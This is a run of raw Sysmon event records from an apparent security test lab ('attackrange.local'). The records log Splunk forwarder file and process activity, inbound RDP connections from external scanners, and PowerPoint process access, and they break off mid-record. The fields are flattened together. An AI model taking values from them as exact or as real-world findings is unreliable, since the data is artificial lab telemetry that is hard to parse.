AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.294{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3761CF7C5C57EE967602081E45E16A83,SHA256=85C1C4B2F6361E6EC9A6A9DD0E0E6ECA6FE27B09D8F4545F15FC133FE06E0A9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050731Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:05.955{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0710EF361D59361C4CEFEBE6CCD521E,SHA256=E77A02C51A8B0F4B5AAA969D36974DFFA58EAA53B92BC23EEE190FCEC9CCAB50,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.637{A7A01FEF-EC3A-607E-670F-00000000BB01}65125940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.481{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC3A-607E-670F-00000000BB01}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.481{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.481{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.481{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.481{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.481{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC3A-607E-670F-00000000BB01}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.481{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC3A-607E-670F-00000000BB01}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.482{A7A01FEF-EC3A-607E-670F-00000000BB01}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.340{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F90C63AF420FC4AAC46FC0B1CB605A9F,SHA256=D37DE111160F73555954680F7CB9ABE7808D00850DEDBAFE9D635ED1BFC381A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:06.325{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9FBE149304DF875A044EC9093FF2695,SHA256=58AE5946FBBD3CFF80274AB2B9142F01B27B0F86DAB7F0F602516D452BC386C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.477{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51274-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.463{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com51944-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050736Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:06.616{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62DADD7003ABA4C744971728C29DFBC2,SHA256=0BC2486C27D15B437DDCA72EDBBAB9FEF72DDF792923B17D0C8FACA6E7593361,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050735Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:04.827{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52545-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050734Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:04.566{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54002-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050733Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:04.452{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59940-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050732Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:03.322{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50951-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000081556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.950{A7A01FEF-EC20-607E-9B0E-00000000BB01}54963212C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da75e|C:\Windows\System32\windows.storage.dll+dab96|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAFB62)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa89b|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.950{A7A01FEF-EC20-607E-9B0E-00000000BB01}54963212C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da75e|C:\Windows\System32\windows.storage.dll+dab96|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAFB62)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa89b|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.934{A7A01FEF-EC20-607E-9B0E-00000000BB01}54963212C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da875|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+146579|C:\Windows\System32\windows.storage.dll+1a3ea8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BB4BB7)|UNKNOWN(FFFFF40710BAF241)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAFB62)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa89b 10341000x800000000000000081553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.934{A7A01FEF-EC20-607E-9B0E-00000000BB01}54963212C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7f1|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+146579|C:\Windows\System32\windows.storage.dll+1a3ea8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BB4BB7)|UNKNOWN(FFFFF40710BAF241)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAFB62)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa89b 10341000x800000000000000081552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.934{A7A01FEF-EC20-607E-9B0E-00000000BB01}54963212C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7d5|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+146579|C:\Windows\System32\windows.storage.dll+1a3ea8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BB4BB7)|UNKNOWN(FFFFF40710BAF241)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAFB62) 10341000x800000000000000081551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.934{A7A01FEF-EC20-607E-9B0E-00000000BB01}54963212C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7d5|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+146579|C:\Windows\System32\windows.storage.dll+1a3ea8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BB4BB7)|UNKNOWN(FFFFF40710BAF241)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAFB62)|UNKNOWN(FFFFF80254603E03) 10341000x800000000000000081550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.934{A7A01FEF-EC20-607E-9B0E-00000000BB01}54963212C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da875|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+146579|C:\Windows\System32\windows.storage.dll+1a3ea8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BB4BB7)|UNKNOWN(FFFFF40710BAF241)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAFB62)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa89b 10341000x800000000000000081549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.934{A7A01FEF-EC20-607E-9B0E-00000000BB01}54963212C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7f1|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+146579|C:\Windows\System32\windows.storage.dll+1a3ea8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BB4BB7)|UNKNOWN(FFFFF40710BAF241)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAFB62)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa89b 10341000x800000000000000081548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.934{A7A01FEF-EC20-607E-9B0E-00000000BB01}54963212C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7d5|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+146579|C:\Windows\System32\windows.storage.dll+1a3ea8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BB4BB7)|UNKNOWN(FFFFF40710BAF241)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAFB62) 10341000x800000000000000081547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.934{A7A01FEF-EC20-607E-9B0E-00000000BB01}54963212C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7d5|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+146579|C:\Windows\System32\windows.storage.dll+1a3ea8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BB4BB7)|UNKNOWN(FFFFF40710BAF241)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAFB62)|UNKNOWN(FFFFF80254603E03) 23542300x800000000000000081546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.512{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE55A7CD0925B87E598D417E4E8CC273,SHA256=1B5FE8153B750083315938B0AB45915E5F737B6CC03F21DA883694E114CC5E3D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 